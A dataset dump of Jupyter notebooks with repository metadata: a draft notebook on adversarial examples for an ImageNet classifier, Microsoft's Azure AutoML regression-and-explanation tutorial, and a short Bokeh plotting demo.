Indeed,\n\\begin{align}\n h_{\\text{new}} = 299,\\; w_{\\text{new}} = h_{\\text{new}} \\frac{w}{h} \\quad\\text{when}\\quad h < w \\\\\n w_{\\text{new}} = 299,\\; h_{\\text{new}} = w_{\\text{new}} \\frac{h}{w} \\quad\\text{when}\\quad h \\ge w\n\\end{align}\n\nwhich converted into words says **_always convert the shorter side to_** `299` and **_the longer side to its rightful length according to the original ratio_**.", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl", "_____no_output_____" ], [ "mpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\nDARK_READER = True\nif DARK_READER:\n plt.rcParams.update({\n \"lines.color\": \"white\",\n \"patch.edgecolor\": \"white\",\n \"text.color\": \"black\",\n \"axes.facecolor\": \"black\",\n \"axes.edgecolor\": \"lightgray\",\n \"axes.labelcolor\": \"white\",\n \"axes.titlecolor\": \"white\",\n \"xtick.color\": \"white\",\n \"ytick.color\": \"white\",\n \"grid.color\": \"lightgray\",\n \"figure.facecolor\": \"black\",\n \"figure.edgecolor\": \"black\",\n \"savefig.facecolor\": \"black\",\n \"savefig.edgecolor\": \"black\",\n })", "_____no_output_____" ], [ "classify(img, correct_class=img_class)", "type(p) = <class 'numpy.ndarray'>, len(p) = 1000\ntopk = [281, 282, 285, 840, 287, 728, 753, 478, 738, 15]\n" ] ], [ [ "# Adversarial examples\n\nGiven an image $\\mathbf{x}$, our neural network outputs a probability distribution over labels, $P(y \\mid \\mathbf{x})$. When we craft an adversarial input, we want to find an $\\hat{\\mathbf{x}}$ where $\\log P(\\hat{y} \\mid \\hat{\\mathbf{x}})$ is maximized for a target label $\\hat{y}$: that way, our input will be misclassified as the target class. 
We can ensure that $\\hat{\\mathbf{x}}$ doesn't look too different from the original $\\mathbf{x}$ by constraining ourselves to some $\\ell_\\infty$ <del>box</del> ball with radius $\\epsilon$, requiring that $\\left\\lVert \\mathbf{x} - \\hat{\\mathbf{x}} \\right\\rVert_\\infty \\le \\epsilon$.\n\nIn this framework, an adversarial example is the solution to a constrained optimization problem that we can solve using [backpropagation](https://colah.github.io/posts/2015-08-Backprop/) and projected gradient descent, basically the same techniques that are used to train networks themselves. The algorithm is simple:\n\nWe begin by initializing our adversarial example as $\\hat{\\mathbf{x}} \\leftarrow \\mathbf{x}$. Then, we repeat the following until convergence:\n\n1. $\\hat{\\mathbf{x}} \\leftarrow \\hat{\\mathbf{x}} + \\alpha \\cdot \\nabla \\log P(\\hat{y} \\mid \\hat{\\mathbf{x}})$\n2. $\\hat{\\mathbf{x}} \\leftarrow \\mathrm{clip}(\\hat{\\mathbf{x}}, \\mathbf{x} - \\epsilon, \\mathbf{x} + \\epsilon)$", "_____no_output_____" ] ], [ [ "demo_epsilon = 2.0/255.0 # a really small perturbation\ndemo_lr = 1e-1\ndemo_steps = 100\ndemo_target = 924 # \"guacamole\"\n# Test other target classes at your own will\ndemo_target = imagenet_labels.index(\"pizza, pizza pie\")\n\n\n# initialization step\n#sess.run(assign_op, feed_dict={x: img})\nx_hat = image\n\n# projected gradient descent\nfor i in tqdm(range(demo_steps)):\n ## gradient descent step\n #_, loss_value = sess.run(\n # [optim_step, loss],\n # feed_dict={learning_rate: demo_lr, y_hat: demo_target})\n ## project step\n #sess.run(project_step, feed_dict={x: img, epsilon: demo_epsilon})\n with tf.GradientTape() as tape:\n log_likelihood = \n if (i+1) % 10 == 0:\n print('step %d, loss=%g' % (i+1, loss_value))", "_____no_output_____" ] ], [ [ "## Continue in `v2.ipynb`\nI would like to wrap `p = inception_model(np.expand_dims(img, axis=0))[0]` inside another function named `inception()` (we might have to replace 
`np.expand_dims()` by `tf.expand_dims()`)", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "raw", "code", "raw", "markdown", "code", "markdown", "code", "raw", "markdown", "code", "raw", "code", "raw", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "raw" ], [ "code", "code", "code", "code", "code", "code" ], [ "raw", "raw" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "raw", "raw" ], [ "markdown" ], [ "code" ], [ "raw", "raw" ], [ "code", "code" ], [ "raw" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e730c092c8a6900598fd883c9bac0424b9bbc48e
36,976
ipynb
Jupyter Notebook
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
1
2020-04-26T23:43:44.000Z
2020-04-26T23:43:44.000Z
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
null
null
null
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
null
null
null
38.922105
422
0.576536
[ [ [ "Copyright (c) Microsoft Corporation. All rights reserved.\n\nLicensed under the MIT License.", "_____no_output_____" ], [ "![Impressions](https://PixelServer20190423114238.azurewebsites.net/api/impressions/MachineLearningNotebooks/how-to-use-azureml/automated-machine-learning/regression-car-price-model-explaination-and-featurization/auto-ml-regression.png)", "_____no_output_____" ], [ "# Automated Machine Learning\n_**Regression with Aml Compute**_\n\n## Contents\n1. [Introduction](#Introduction)\n1. [Setup](#Setup)\n1. [Data](#Data)\n1. [Train](#Train)\n1. [Results](#Results)\n1. [Test](#Test)\n", "_____no_output_____" ], [ "## Introduction\nIn this example we use the Hardware Performance Dataset to showcase how you can use AutoML for a simple regression problem. The Regression goal is to predict the performance of certain combinations of hardware parts.\nAfter training AutoML models for this regression data set, we show how you can compute model explanations on your remote compute using a sample explainer script.\n\nIf you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, go through the [configuration](../../../configuration.ipynb) notebook first if you haven't already to establish your connection to the AzureML Workspace. \n\nAn Enterprise workspace is required for this notebook. To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade) \n\nIn this notebook you will learn how to:\n1. Create an `Experiment` in an existing `Workspace`.\n2. Instantiating AutoMLConfig with FeaturizationConfig for customization\n3. Train the model using remote compute.\n4. Explore the results and featurization transparency options\n5. Setup remote compute for computing the model explanations for a given AutoML model.\n6. 
Start an AzureML experiment on your remote compute to compute explanations for an AutoML model.\n7. Download the feature importance for engineered features and visualize the explanations for engineered features on azure portal. \n8. Download the feature importance for raw features and visualize the explanations for raw features on azure portal. \n", "_____no_output_____" ], [ "## Setup\n\nAs part of the setup you have already created an Azure ML `Workspace` object. For Automated ML you will need to create an `Experiment` object, which is a named object in a `Workspace` used to run experiments.", "_____no_output_____" ] ], [ [ "import logging\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport azureml.core\nfrom azureml.core.experiment import Experiment\nfrom azureml.core.workspace import Workspace\nimport azureml.dataprep as dprep\nfrom azureml.automl.core.featurization import FeaturizationConfig\nfrom azureml.train.automl import AutoMLConfig\nfrom azureml.core.dataset import Dataset", "_____no_output_____" ] ], [ [ "This sample notebook may use features that are not available in previous versions of the Azure ML SDK.", "_____no_output_____" ] ], [ [ "print(\"This notebook was created using version 1.3.0 of the Azure ML SDK\")\nprint(\"You are currently using version\", azureml.core.VERSION, \"of the Azure ML SDK\")", "_____no_output_____" ], [ "ws = Workspace.from_config()\n\n# Choose a name for the experiment.\nexperiment_name = 'automl-regression-hardware-explain'\nexperiment = Experiment(ws, experiment_name)\n\noutput = {}\noutput['Subscription ID'] = ws.subscription_id\noutput['Workspace Name'] = ws.name\noutput['Resource Group'] = ws.resource_group\noutput['Location'] = ws.location\noutput['Experiment Name'] = experiment.name\npd.set_option('display.max_colwidth', -1)\noutputDf = pd.DataFrame(data = output, index = [''])\noutputDf.T", "_____no_output_____" ] ], [ [ "### Create or Attach existing AmlCompute\nYou will need 
to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for your AutoML run. In this tutorial, you create `AmlCompute` as your training compute resource.\n\n**Creation of AmlCompute takes approximately 5 minutes.** If the AmlCompute with that name is already in your workspace this code will skip the creation process.\n\nAs with other Azure services, there are limits on certain resources (e.g. AmlCompute) associated with the Azure Machine Learning service. Please read [this article](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-manage-quotas) on the default limits and how to request more quota.", "_____no_output_____" ] ], [ [ "from azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\n\n# Choose a name for your cluster.\namlcompute_cluster_name = \"hardware-cluster\"\n\n# Verify that cluster does not exist already\ntry:\n compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)\n print('Found existing cluster, use it.')\nexcept ComputeTargetException:\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_D2_V2',\n max_nodes=4)\n compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)\n\ncompute_target.wait_for_completion(show_output=True)", "_____no_output_____" ] ], [ [ "### Setup Training and Test Data for AutoML experiment\n\nLoad the hardware dataset from a csv file containing both training features and labels. The features are inputs to the model, while the training labels represent the expected output of the model. Next, we'll split the data using random_split and extract the training data for the model. 
We also register the datasets in your workspace using a name so that these datasets may be accessed from the remote compute.", "_____no_output_____" ] ], [ [ "data = 'https://automlsamplenotebookdata.blob.core.windows.net/automl-sample-notebook-data/machineData.csv'\n\ndataset = Dataset.Tabular.from_delimited_files(data)\n\n# Split the dataset into train and test datasets\ntrain_data, test_data = dataset.random_split(percentage=0.8, seed=223)\n\n\n# Register the train dataset with your workspace\ntrain_data.register(workspace = ws, name = 'machineData_train_dataset',\n description = 'hardware performance training data',\n create_new_version=True)\n\n# Register the test dataset with your workspace\ntest_data.register(workspace = ws, name = 'machineData_test_dataset', description = 'hardware performance test data', create_new_version=True)\n\nlabel =\"ERP\"\n\ntrain_data.to_pandas_dataframe().head()", "_____no_output_____" ] ], [ [ "## Train\n\nInstantiate an `AutoMLConfig` object to specify the settings and data used to run the experiment.\n\n|Property|Description|\n|-|-|\n|**task**|classification, regression or forecasting|\n|**primary_metric**|This is the metric that you want to optimize. Regression supports the following primary metrics: <br><i>spearman_correlation</i><br><i>normalized_root_mean_squared_error</i><br><i>r2_score</i><br><i>normalized_mean_absolute_error</i>|\n|**experiment_timeout_hours**| Maximum amount of time in hours that all iterations combined can take before the experiment terminates.|\n|**enable_early_stopping**| Flag to enble early termination if the score is not improving in the short term.|\n|**featurization**| 'auto' / 'off' / FeaturizationConfig Indicator for whether featurization step should be done automatically or not, or whether customized featurization should be used. Setting this enables AutoML to perform featurization on the input to handle *missing data*, and to perform some common *feature extraction*. 
Note: If the input data is sparse, featurization cannot be turned on.|\n|**n_cross_validations**|Number of cross validation splits.|\n|**training_data**|(sparse) array-like, shape = [n_samples, n_features]|\n|**label_column_name**|(sparse) array-like, shape = [n_samples, ], targets values.|", "_____no_output_____" ], [ "## Customization\n\nThis step requires an Enterprise workspace to gain access to this feature. To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade). \n\nSupported customization includes:\n1. Column purpose update: Override feature type for the specified column.\n2. Transformer parameter update: Update parameters for the specified transformer. Currently supports Imputer and HashOneHotEncoder.\n3. Drop columns: Columns to drop from being featurized.\n4. Block transformers: Allow/Block transformers to be used on featurization process.", "_____no_output_____" ], [ "Create FeaturizationConfig object using API calls", "_____no_output_____" ] ], [ [ "featurization_config = FeaturizationConfig()\nfeaturization_config.blocked_transformers = ['LabelEncoder']\n#featurization_config.drop_columns = ['MMIN']\nfeaturization_config.add_column_purpose('MYCT', 'Numeric')\nfeaturization_config.add_column_purpose('VendorName', 'CategoricalHash')\n#default strategy mean, add transformer param for for 3 columns\nfeaturization_config.add_transformer_params('Imputer', ['CACH'], {\"strategy\": \"median\"})\nfeaturization_config.add_transformer_params('Imputer', ['CHMIN'], {\"strategy\": \"median\"})\nfeaturization_config.add_transformer_params('Imputer', ['PRP'], {\"strategy\": \"most_frequent\"})\n#featurization_config.add_transformer_params('HashOneHotEncoder', [], {\"number_of_bits\": 3})", "_____no_output_____" ], [ "automl_settings = {\n \"enable_early_stopping\": True, \n 
\"experiment_timeout_hours\" : 0.25,\n \"max_concurrent_iterations\": 4,\n \"max_cores_per_iteration\": -1,\n \"n_cross_validations\": 5,\n \"primary_metric\": 'normalized_root_mean_squared_error',\n \"verbosity\": logging.INFO\n}\n\nautoml_config = AutoMLConfig(task = 'regression',\n debug_log = 'automl_errors.log',\n compute_target=compute_target,\n featurization=featurization_config,\n training_data = train_data,\n label_column_name = label,\n **automl_settings\n )", "_____no_output_____" ] ], [ [ "Call the `submit` method on the experiment object and pass the run configuration. Execution of local runs is synchronous. Depending on the data and the number of iterations this can run for a while.\nIn this example, we specify `show_output = True` to print currently running iterations to the console.", "_____no_output_____" ] ], [ [ "remote_run = experiment.submit(automl_config, show_output = False)", "_____no_output_____" ], [ "remote_run", "_____no_output_____" ] ], [ [ "Run the following cell to access previous runs. 
Uncomment the cell below and update the run_id.", "_____no_output_____" ] ], [ [ "#from azureml.train.automl.run import AutoMLRun\n#remote_run = AutoMLRun(experiment=experiment, run_id='<run_ID_goes_here')\n#remote_run", "_____no_output_____" ], [ "remote_run.wait_for_completion()", "_____no_output_____" ], [ "best_run, fitted_model = remote_run.get_output()", "_____no_output_____" ], [ "best_run_customized, fitted_model_customized = remote_run.get_output()", "_____no_output_____" ] ], [ [ "## Transparency\n\nView updated featurization summary", "_____no_output_____" ] ], [ [ "custom_featurizer = fitted_model_customized.named_steps['datatransformer']", "_____no_output_____" ], [ "custom_featurizer.get_featurization_summary()", "_____no_output_____" ] ], [ [ "is_user_friendly=False allows for more detailed summary for transforms being applied", "_____no_output_____" ] ], [ [ "custom_featurizer.get_featurization_summary(is_user_friendly=False)", "_____no_output_____" ], [ "custom_featurizer.get_stats_feature_type_summary()", "_____no_output_____" ] ], [ [ "## Results", "_____no_output_____" ], [ "#### Widget for Monitoring Runs\n\nThe widget will first report a \"loading\" status while running the first iteration. After completing the first iteration, an auto-updating graph and table will be shown. The widget will refresh once per minute, so you should see the graph update as child runs complete.\n\n**Note:** The widget displays a link at the bottom. Use this link to open a web interface to explore the individual run details", "_____no_output_____" ] ], [ [ "from azureml.widgets import RunDetails\nRunDetails(remote_run).show() ", "_____no_output_____" ] ], [ [ "## Explanations\nThis step requires an Enterprise workspace to gain access to this feature. 
To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade). \nThis section will walk you through the workflow to compute model explanations for an AutoML model on your remote compute.\n\n### Retrieve any AutoML Model for explanations\n\nBelow we select the some AutoML pipeline from our iterations. The `get_output` method returns the a AutoML run and the fitted model for the last invocation. Overloads on `get_output` allow you to retrieve the best run and fitted model for *any* logged metric or for a particular *iteration*.", "_____no_output_____" ] ], [ [ "automl_run, fitted_model = remote_run.get_output(metric='r2_score')", "_____no_output_____" ] ], [ [ "### Setup model explanation run on the remote compute\nThe following section provides details on how to setup an AzureML experiment to run model explanations for an AutoML model on your remote compute.", "_____no_output_____" ], [ "#### Sample script used for computing explanations\nView the sample script for computing the model explanations for your AutoML model on remote compute.", "_____no_output_____" ] ], [ [ "with open('train_explainer.py', 'r') as cefr:\n print(cefr.read())", "_____no_output_____" ] ], [ [ "#### Substitute values in your sample script\nThe following cell shows how you change the values in the sample script so that you can change the sample script according to your experiment and dataset.", "_____no_output_____" ] ], [ [ "import shutil\nimport os\n\n# create script folder\nscript_folder = './sample_projects/automl-regression-hardware'\nif not os.path.exists(script_folder):\n os.makedirs(script_folder)\n\n# Copy the sample script to script folder.\nshutil.copy('train_explainer.py', script_folder)\n\n# Create the explainer script that will run on the remote compute.\nscript_file_name = script_folder + 
'/train_explainer.py'\n\n# Open the sample script for modification\nwith open(script_file_name, 'r') as cefr:\n content = cefr.read()\n\n# Replace the values in train_explainer.py file with the appropriate values\ncontent = content.replace('<<experiment_name>>', automl_run.experiment.name) # your experiment name.\ncontent = content.replace('<<run_id>>', automl_run.id) # Run-id of the AutoML run for which you want to explain the model.\ncontent = content.replace('<<target_column_name>>', 'ERP') # Your target column name\ncontent = content.replace('<<task>>', 'regression') # Training task type\n# Name of your training dataset register with your workspace\ncontent = content.replace('<<train_dataset_name>>', 'machineData_train_dataset') \n# Name of your test dataset register with your workspace\ncontent = content.replace('<<test_dataset_name>>', 'machineData_test_dataset')\n\n# Write sample file into your script folder.\nwith open(script_file_name, 'w') as cefw:\n cefw.write(content)", "_____no_output_____" ] ], [ [ "#### Create conda configuration for model explanations experiment from automl_run object", "_____no_output_____" ] ], [ [ "from azureml.core.runconfig import RunConfiguration\nfrom azureml.core.conda_dependencies import CondaDependencies\nimport pkg_resources\n\n# create a new RunConfig object\nconda_run_config = RunConfiguration(framework=\"python\")\n\n# Set compute target to AmlCompute\nconda_run_config.target = compute_target\nconda_run_config.environment.docker.enabled = True\n\n# specify CondaDependencies obj\nconda_run_config.environment.python.conda_dependencies = automl_run.get_environment().python.conda_dependencies", "_____no_output_____" ] ], [ [ "#### Submit the experiment for model explanations\nSubmit the experiment with the above `run_config` and the sample script for computing explanations.", "_____no_output_____" ] ], [ [ "# Now submit a run on AmlCompute for model explanations\nfrom azureml.core.script_run_config import 
ScriptRunConfig\n\nscript_run_config = ScriptRunConfig(source_directory=script_folder,\n script='train_explainer.py',\n run_config=conda_run_config)\n\nrun = experiment.submit(script_run_config)\n\n# Show run details\nrun", "_____no_output_____" ], [ "%%time\n# Shows output of the run on stdout.\nrun.wait_for_completion(show_output=True)", "_____no_output_____" ] ], [ [ "### Feature importance and visualizing explanation dashboard\nIn this section we describe how you can download the explanation results from the explanations experiment and visualize the feature importance for your AutoML model on the azure portal.", "_____no_output_____" ], [ "#### Download engineered feature importance from artifact store\nYou can use *ExplanationClient* to download the engineered feature explanations from the artifact store of the *automl_run*. You can also use azure portal url to view the dash board visualization of the feature importance values of the engineered features.", "_____no_output_____" ] ], [ [ "from azureml.explain.model._internal.explanation_client import ExplanationClient\nclient = ExplanationClient.from_run(automl_run)\nengineered_explanations = client.download_model_explanation(raw=False, comment='engineered explanations')\nprint(engineered_explanations.get_feature_importance_dict())\nprint(\"You can visualize the engineered explanations under the 'Explanations (preview)' tab in the AutoML run at:-\\n\" + automl_run.get_portal_url())", "_____no_output_____" ] ], [ [ "#### Download raw feature importance from artifact store\nYou can use *ExplanationClient* to download the raw feature explanations from the artifact store of the *automl_run*. 
You can also use azure portal url to view the dash board visualization of the feature importance values of the raw features.", "_____no_output_____" ] ], [ [ "raw_explanations = client.download_model_explanation(raw=True, comment='raw explanations')\nprint(raw_explanations.get_feature_importance_dict())\nprint(\"You can visualize the raw explanations under the 'Explanations (preview)' tab in the AutoML run at:-\\n\" + automl_run.get_portal_url())", "_____no_output_____" ] ], [ [ "## Operationailze\nIn this section we will show how you can operationalize an AutoML model and the explainer which was used to compute the explanations in the previous section.\n\n### Register the AutoML model and the scoring explainer\nWe use the *TreeScoringExplainer* from *azureml.explain.model* package to create the scoring explainer which will be used to compute the raw and engineered feature importances at the inference time. \nIn the cell below, we register the AutoML model and the scoring explainer with the Model Management Service.", "_____no_output_____" ] ], [ [ "# Register trained automl model present in the 'outputs' folder in the artifacts\noriginal_model = automl_run.register_model(model_name='automl_model', \n model_path='outputs/model.pkl')\nscoring_explainer_model = automl_run.register_model(model_name='scoring_explainer',\n model_path='outputs/scoring_explainer.pkl')", "_____no_output_____" ] ], [ [ "### Create the conda dependencies for setting up the service\nWe need to create the conda dependencies comprising of the *azureml-explain-model*, *azureml-train-automl* and *azureml-defaults* packages. 
", "_____no_output_____" ] ], [ [ "conda_dep = automl_run.get_environment().python.conda_dependencies\n\nwith open(\"myenv.yml\",\"w\") as f:\n f.write(conda_dep.serialize_to_string())\n\nwith open(\"myenv.yml\",\"r\") as f:\n print(f.read())", "_____no_output_____" ] ], [ [ "### View your scoring file", "_____no_output_____" ] ], [ [ "with open(\"score_explain.py\",\"r\") as f:\n print(f.read())", "_____no_output_____" ] ], [ [ "### Deploy the service\nIn the cell below, we deploy the service using the conda file and the scoring file from the previous steps. ", "_____no_output_____" ] ], [ [ "from azureml.core.webservice import Webservice\nfrom azureml.core.model import InferenceConfig\nfrom azureml.core.webservice import AciWebservice\nfrom azureml.core.model import Model\nfrom azureml.core.environment import Environment\n\naciconfig = AciWebservice.deploy_configuration(cpu_cores=1, \n memory_gb=1, \n tags={\"data\": \"Machine Data\", \n \"method\" : \"local_explanation\"}, \n description='Get local explanations for Machine test data')\n\nmyenv = Environment.from_conda_specification(name=\"myenv\", file_path=\"myenv.yml\")\ninference_config = InferenceConfig(entry_script=\"score_explain.py\", environment=myenv)\n\n# Use configs and models generated above\nservice = Model.deploy(ws, 'model-scoring', [scoring_explainer_model, original_model], inference_config, aciconfig)\nservice.wait_for_deployment(show_output=True)", "_____no_output_____" ] ], [ [ "### View the service logs", "_____no_output_____" ] ], [ [ "service.get_logs()", "_____no_output_____" ] ], [ [ "### Inference using some test data\nInference using some test data to see the predicted value from autml model, view the engineered feature importance for the predicted value and raw feature importance for the predicted value.", "_____no_output_____" ] ], [ [ "if service.state == 'Healthy':\n X_test = test_data.drop_columns([label]).to_pandas_dataframe()\n # Serialize the first row of the test data into 
json\n X_test_json = X_test[:1].to_json(orient='records')\n print(X_test_json)\n # Call the service to get the predictions and the engineered and raw explanations\n output = service.run(X_test_json)\n # Print the predicted value\n print(output['predictions'])\n # Print the engineered feature importances for the predicted value\n print(output['engineered_local_importance_values'])\n # Print the raw feature importances for the predicted value\n print(output['raw_local_importance_values'])", "_____no_output_____" ] ], [ [ "### Delete the service\nDelete the service once you have finished inferencing.", "_____no_output_____" ] ], [ [ "service.delete()", "_____no_output_____" ] ], [ [ "## Test", "_____no_output_____" ] ], [ [ "# preview the first 3 rows of the dataset\n\ntest_data = test_data.to_pandas_dataframe()\ny_test = test_data['ERP'].fillna(0)\ntest_data = test_data.drop('ERP', 1)\ntest_data = test_data.fillna(0)\n\n\ntrain_data = train_data.to_pandas_dataframe()\ny_train = train_data['ERP'].fillna(0)\ntrain_data = train_data.drop('ERP', 1)\ntrain_data = train_data.fillna(0)", "_____no_output_____" ], [ "y_pred_train = fitted_model.predict(train_data)\ny_residual_train = y_train - y_pred_train\n\ny_pred_test = fitted_model.predict(test_data)\ny_residual_test = y_test - y_pred_test", "_____no_output_____" ], [ "%matplotlib inline\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# Set up a multi-plot chart.\nf, (a0, a1) = plt.subplots(1, 2, gridspec_kw = {'width_ratios':[1, 1], 'wspace':0, 'hspace': 0})\nf.suptitle('Regression Residual Values', fontsize = 18)\nf.set_figheight(6)\nf.set_figwidth(16)\n\n# Plot residual values of training set.\na0.axis([0, 360, -100, 100])\na0.plot(y_residual_train, 'bo', alpha = 0.5)\na0.plot([-10,360],[0,0], 'r-', lw = 3)\na0.text(16,170,'RMSE = {0:.2f}'.format(np.sqrt(mean_squared_error(y_train, y_pred_train))), fontsize = 12)\na0.text(16,140,'R2 score = {0:.2f}'.format(r2_score(y_train, y_pred_train)),fontsize = 
12)\na0.set_xlabel('Training samples', fontsize = 12)\na0.set_ylabel('Residual Values', fontsize = 12)\n\n# Plot residual values of test set.\na1.axis([0, 90, -100, 100])\na1.plot(y_residual_test, 'bo', alpha = 0.5)\na1.plot([-10,360],[0,0], 'r-', lw = 3)\na1.text(5,170,'RMSE = {0:.2f}'.format(np.sqrt(mean_squared_error(y_test, y_pred_test))), fontsize = 12)\na1.text(5,140,'R2 score = {0:.2f}'.format(r2_score(y_test, y_pred_test)),fontsize = 12)\na1.set_xlabel('Test samples', fontsize = 12)\na1.set_yticklabels([])\n\nplt.show()", "_____no_output_____" ], [ "%matplotlib inline\ntest_pred = plt.scatter(y_test, y_pred_test, color='')\ntest_test = plt.scatter(y_test, y_test, color='g')\nplt.legend((test_pred, test_test), ('prediction', 'truth'), loc='upper left', fontsize=8)\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e730c63eacacb69294fc81c32022d8341f205a13
9,346
ipynb
Jupyter Notebook
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
null
null
null
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
4
2021-08-23T20:44:21.000Z
2022-03-12T00:29:34.000Z
Semana_1/Untitled.ipynb
sebastiangonzalezv/examen_estadistica
13429fb7a0f425c650a6f3ba5fa051696a2e23c3
[ "MIT" ]
null
null
null
56.642424
3,851
0.535416
[ [ [ "\n\nimport bokeh.sampledata\nbokeh.sampledata.download()\n\nimport numpy as np # we will use this later, so import it now\n\nfrom bokeh.io import output_notebook, show\nfrom bokeh.plotting import figure\n\n\n\nimport bokeh.sampledata\nbokeh.sampledata.download()\n\np = figure(plot_width=400, plot_height=400)\n\n# add a circle renderer with x and y coordinates, size, color, and alpha\np.circle([1, 2, 3, 4, 5], [6, 7, 2, 4, 5], size=15, line_color=\"navy\", fill_color=\"orange\", fill_alpha=0.5)\n\nshow(p) # show the results", "Using data directory: C:\\Users\\sebas\\.bokeh\\data\nSkipping 'CGM.csv' (checksum match)\nSkipping 'US_Counties.zip' (checksum match)\nSkipping 'us_cities.json' (checksum match)\nSkipping 'unemployment09.csv' (checksum match)\nSkipping 'AAPL.csv' (checksum match)\nSkipping 'FB.csv' (checksum match)\nSkipping 'GOOG.csv' (checksum match)\nSkipping 'IBM.csv' (checksum match)\nSkipping 'MSFT.csv' (checksum match)\nSkipping 'WPP2012_SA_DB03_POPULATION_QUINQUENNIAL.zip' (checksum match)\nSkipping 'gapminder_fertility.csv' (checksum match)\nSkipping 'gapminder_population.csv' (checksum match)\nSkipping 'gapminder_life_expectancy.csv' (checksum match)\nSkipping 'gapminder_regions.csv' (checksum match)\nSkipping 'world_cities.zip' (checksum match)\nSkipping 'airports.json' (checksum match)\nSkipping 'movies.db.zip' (checksum match)\nSkipping 'airports.csv' (checksum match)\nSkipping 'routes.csv' (checksum match)\nSkipping 'haarcascade_frontalface_default.xml' (checksum match)\nUsing data directory: C:\\Users\\sebas\\.bokeh\\data\nSkipping 'CGM.csv' (checksum match)\nSkipping 'US_Counties.zip' (checksum match)\nSkipping 'us_cities.json' (checksum match)\nSkipping 'unemployment09.csv' (checksum match)\nSkipping 'AAPL.csv' (checksum match)\nSkipping 'FB.csv' (checksum match)\nSkipping 'GOOG.csv' (checksum match)\nSkipping 'IBM.csv' (checksum match)\nSkipping 'MSFT.csv' (checksum match)\nSkipping 'WPP2012_SA_DB03_POPULATION_QUINQUENNIAL.zip' 
(checksum match)\nSkipping 'gapminder_fertility.csv' (checksum match)\nSkipping 'gapminder_population.csv' (checksum match)\nSkipping 'gapminder_life_expectancy.csv' (checksum match)\nSkipping 'gapminder_regions.csv' (checksum match)\nSkipping 'world_cities.zip' (checksum match)\nSkipping 'airports.json' (checksum match)\nSkipping 'movies.db.zip' (checksum match)\nSkipping 'airports.csv' (checksum match)\nSkipping 'routes.csv' (checksum match)\nSkipping 'haarcascade_frontalface_default.xml' (checksum match)\n" ] ] ]
[ "code" ]
[ [ "code" ] ]
e730cbaecda85ec4beba3da46f110f0f7b7e0f86
44,937
ipynb
Jupyter Notebook
code/Modsim_project_1.ipynb
ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
code/Modsim_project_1.ipynb
ttandler/ModSimPy
92e8257ef2e63b7aa8629d220a81933e7706a760
[ "MIT" ]
null
null
null
code/Modsim_project_1.ipynb
